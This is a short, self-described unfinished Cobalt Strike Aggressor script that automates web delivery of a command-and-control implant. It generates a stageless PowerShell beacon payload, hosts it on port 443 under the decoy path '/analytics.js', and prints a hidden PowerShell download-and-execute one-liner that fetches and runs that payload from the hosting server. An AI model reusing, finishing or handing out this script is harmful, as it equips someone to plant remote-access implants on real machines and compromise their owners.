# This is not working yet. Need to get it working to actually create a web delivery payload.

sub createDownloadString {
    local ('$listener $host $url');
    
    $listener = $1;
    println($listener);
    
    $host = listener_info($listener)['host'];
    println($host);

    # Deprecated Method. Replacing with artifact_payload    
    # artifact_stageless($listener, "powershell", "x64", $null, $this);
    # yield;

    $script = artifact_payload($listener, "powershell", "x64");
    # println($script);
    
    site_host($host, 443, "/analytics.js", $script, "text/plain", "Scripted Web Delivery(powershell)");
    $url = site_host($host, 443, "/analytics.js", $script, "text/plain", "Scripted Web Delivery(powershell)");
    $url = strrep($url, "http", "https");
    
    # Debug Logging
    println($url);

    $downloadString = "powershell.exe -nop -w hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('";
    $downloadString .= $url . "'))\"";
    
    # println("Returning DownloadString $downloadString");
    say("Here's your DownloadString: \c9$downloadString\o");
}